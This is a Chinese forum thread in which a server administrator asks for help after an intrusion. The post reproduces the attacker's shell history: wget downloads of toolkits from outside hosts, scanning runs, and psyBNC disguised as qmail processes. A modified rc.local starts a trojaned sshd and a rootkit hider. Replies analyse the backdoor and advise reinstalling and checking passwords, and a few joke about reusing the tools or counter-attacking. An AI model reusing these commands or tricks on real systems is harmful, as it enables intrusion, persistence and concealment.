免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 3876 | 回复: 12
打印 上一主题 下一主题

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-10-08 12:05 |只看该作者 |倒序浏览
系统是redHat 9,自己编译的内核 2.4.27 ,装了apche、mysql、php、proftp、qmail。

今天早上登录系统,查看系统日志,发现/var/log/ 下面被删了个干净,
再查看history 发现下面的内容
  2  cd /dev/.man
   3  cd /dev/ida/.man
   4  wget www.warrlop.0catch.com/a.tgz
   5  wget 209.63.57.10/a.tgz
   6  ftp
   7  ps x
   8  wget www.rossi25.go.ro/xx.tgz
   9  tar xzvf xx.tgz
  10  rm -rf xx.tgz
  11  cd .sh
  12  ls
  13  ./x 65.35
  14  ./x 216.48
  15  ./x 216.49
  16  exit
  17  cd /var/tmp'ls -a
  18  cd /var/tmp;ls -a
  19  cd /var/dev
  20  cd /dev
  21  mkdir "."
  22  mkdir " "
  23  cd " "
  24  wget iceghost.go.ro/b.tar.gz
  25  RM -RF no_user.phtml
  26  rm -rf no_user.phtml
  27  wget geocities.com/kiaxk/b.tar.gz
  28  wget http://www.psychoid.net/psyBNC2.3.1.tar.gz
  29  tar zxvf psyBNC2.3.1.tar.gz
  30  rm -rf psyBNC2.3.1.tar.gz
  31  mv psybnc html
  32  cd html
  33  ls -a
  34  ps -ax
  35  mv psybnc [httpd <defunct>;]
  36   mv psybnc "[httpd <defunct>;]"
  37  mv psybnc "qmail-clean"
  38  ls -a
  39  make
  40  ps -ax
  41  mv psybnc "/var/qmail/bin/qmail-queue"
  42  mv psybnc "qmail-clean"
  43  PATHATH
  44  PATH=ATH
  45  "qmail-clean"
  46  uname -a
  47  id

论坛徽章:
0
2 [报告]
发表于 2005-10-08 14:22 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

发现rc.local被修改,如下:


killall -9 sshd 2>;/dev/null
/bin/.../sshd/sbin/sshd1 2>;/dev/null
/bin/.../hate/sk >; hide 2>;/dev/null
/bin/.../hate/sk i `/sbin/pidof /bin/.../sshd/sbin/sshd1` >;>; hide 2>;/dev/null
rm -rf hide 2>;/dev/null
rm -rf /var/lock/subsys/sshd 2>;/dev/null
/bin/up2date 2>; /dev/null
echo 1 >; /proc/sys/net/ipv4/tcp_syncookies
echo 1 >; /proc/sys/net/ipv4/icmp_echo_ignore_all

论坛徽章:
0
3 [报告]
发表于 2005-10-08 14:44 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

你完蛋了,重装吧
重装之前最好把他的东西都找出来(借我用用 :))


下次用强一点的密码

论坛徽章:
0
4 [报告]
发表于 2005-10-08 14:49 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

什么阿?要重装也要搞明白,人家怎么把自己的系统弄乱的阿,这个入侵的人装的是什么软件阿?还有那些修改rc.local,是做什么用的?

论坛徽章:
0
5 [报告]
发表于 2005-10-08 14:59 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

那个家伙好象是暴力破解了你的口令(也许,好象,大概)
然后又拿到了root权限,或是直接破解了root的密码
然后有用你的机器去破解别人的机器

rc.local里是拿他的sshd替换你的sshd,这样他就可以
自由登陆你的机器,也许还可以记录你的口令
似乎还装了 rootkit , (不确定) /bin/.../hate/sk

论坛徽章:
0
6 [报告]
发表于 2005-10-08 15:11 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

噢,先谢谢你,我再查查资料,先搞明白,重装系统看来是必要的了。

论坛徽章:
0
7 [报告]
发表于 2005-10-08 23:19 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

到现在还一个Linux肉鸡没有

论坛徽章:
0
8 [报告]
发表于 2005-10-09 08:53 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

原帖由 "dajun" 发表:
重装之前最好把他的东西都找出来(借我用用 :))

根据history里内容去找啊,有能力的话把那片的机器搞定了,估计资料还挺多的呢

论坛徽章:
0
9 [报告]
发表于 2005-10-09 08:58 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

楼主把你的shadow用john跑一下,看有没有弱口令,有的话估计是弱口令出了问题.如果不是的估计问题出在你的服务上了,最有可能的就是apache和mysql了,如果是这两个的话注意打补丁和防止注入.入侵者主要的动作是提升权限和留后门吧,把后门相关的东西清一下,然后把ssh重装一下,应该问题不大.关键是找出入侵原因,不然即使是重装了别人还能进来的

论坛徽章:
0
10 [报告]
发表于 2005-10-09 09:05 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

入侵者功力不够啊
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP